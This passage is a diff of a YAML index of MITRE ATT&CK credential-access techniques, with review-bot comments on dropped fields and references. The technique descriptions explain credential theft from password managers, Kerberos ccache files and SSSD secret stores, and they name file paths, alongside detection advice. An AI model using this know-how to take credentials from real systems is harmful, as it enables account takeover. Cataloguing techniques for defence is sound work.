+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
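Review bot: in the T1555.005 (Password Managers) region this hunk removes `x_mitre_detection`, `x_mitre_data_sources` ('Process: Process Access', 'Process: OS API Execution', 'File: File Access', 'Command: Command Execution') and `x_mitre_permissions_required: User` with no visible re-addition, while the `url:` lines are merely moved below each `description:` (a key re-order from a regenerated export). Dropping `x_mitre_permissions_required` and `spec_version` is consistent with the bump to `x_mitre_attack_spec_version: 3.2.0`, but `x_mitre_detection` and `x_mitre_data_sources` remain in use by the other techniques in this patch (T1556.002, for instance, keeps `x_mitre_data_sources:` with 'Module: Module Load'), so confirm they were relocated above the hunk start rather than lost; the same check applies to the removed `modified`, `name` and `description` keys, which should reappear at the top of the object.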
@@ -44559,12 +45205,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44613,38 +45258,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44668,76 +45288,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
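Review bot: the new T1558.005 entry is named `Ccache Files` without the parent-technique prefix, unlike the sibling sub-techniques in this file (`'Steal or Forge Kerberos Tickets: AS-REP Roasting'` for T1558.004, `'Modify Authentication Process: Password Filter DLL'` for T1556.002); either align it to `'Steal or Forge Kerberos Tickets: Ccache Files'` or confirm the unprefixed name is what upstream publishes. The entry also lacks the `identifier: T1558.005` line that T1556.002 and T1558.004 carry just before `atomic_tests: []`. In its double-quoted `description:` scalar, the inline-code markers around `/etc/krb5.conf`, `KRB5CCNAME`, `kinit` and `klist` show up here as bare line breaks (the lines `configuration` and `,` have no `+` prefix), so verify the source YAML still carries the markup; otherwise line folding yields `kinit ,` and `klist ,` with a stray space before the comma. Minor: the `Binary Defense Kerberos Linux` description opens with a leading space (`" ARC Labs, ...`), `x_mitre_detection: ''` is empty even though a 'File: File Access' data source is listed, and the T1556.002 block drops `x_mitre_permissions_required` (Administrator, SYSTEM) alongside its `'2.0'` to `'2.1'` version bump, which is consistent with the 3.2.0 spec but worth stating in the commit message.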
@@ -44772,6 +45445,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44779,32 +45459,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
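Review bot: the paragraphs removed from the T1558 description (Linux ccache/SSSD and macOS KCM) are only partly carried over into the new T1558.005 description: the SSSD detail that `/var/lib/sss/secrets/secrets.ldb` and `/var/lib/sss/secrets/.secrets.mkey` hold a copy of the ticket database and that both require root to read is absent from T1558.005, which names only the `/tmp` `krb5cc_%UID%` location, and so is the note that macOS KCM access is mediated over Mach RPC using the caller's environment. Root-only reads of those paths are the concrete thing a defender can monitor, so confirm this loss is intended upstream rather than an artifact of the regeneration. The rest of the hunk is sound: T1558.004 bumps `x_mitre_version` to `'1.1'` together with the Harmj0y reference moving from `http://www.harmj0y.net/...` to `https://blog.harmj0y.net/...` with a refreshed retrieval date, and `x_mitre_permissions_required: User` is dropped in line with the 3.2.0 spec.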
@@ -44840,7 +45556,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -44865,13 +45581,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -44880,14 +45589,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
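Review bot: the `macOS kerberos framework MIT` and `MIT ccache` references removed here are not re-added under T1558.005 (whose reference list carries Kekeo, SpectorOps Bifrost, Brining MimiKatz to Unix and Linux Kerberos Tickets, but not these two), so the MIT credential-cache definition and the Kerberos-for-Macintosh preferences documentation drop out of the file entirely. That is consistent with the trimmed T1558 description no longer citing them, but the T1558.005 text still describes `/etc/krb5.conf` and `KRB5CCNAME` behaviour that those sources documented, so check whether upstream meant to keep them.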
@@ -44909,23 +45610,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -44976,12 +45668,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44993,6 +45684,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -45007,18 +45699,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
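Review bot: the T1552 platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (hence the `'1.3'` to `'1.4'` bump). Any per-platform index derived from `x_mitre_platforms` will now list this technique under the two new names and no longer under the three removed ones, so the derived index files need regenerating in the same change; also check whether other cloud techniques in this file still use the old platform vocabulary, since a partial migration leaves the indexes split across old and new names.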
@@ -45041,37 +45733,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
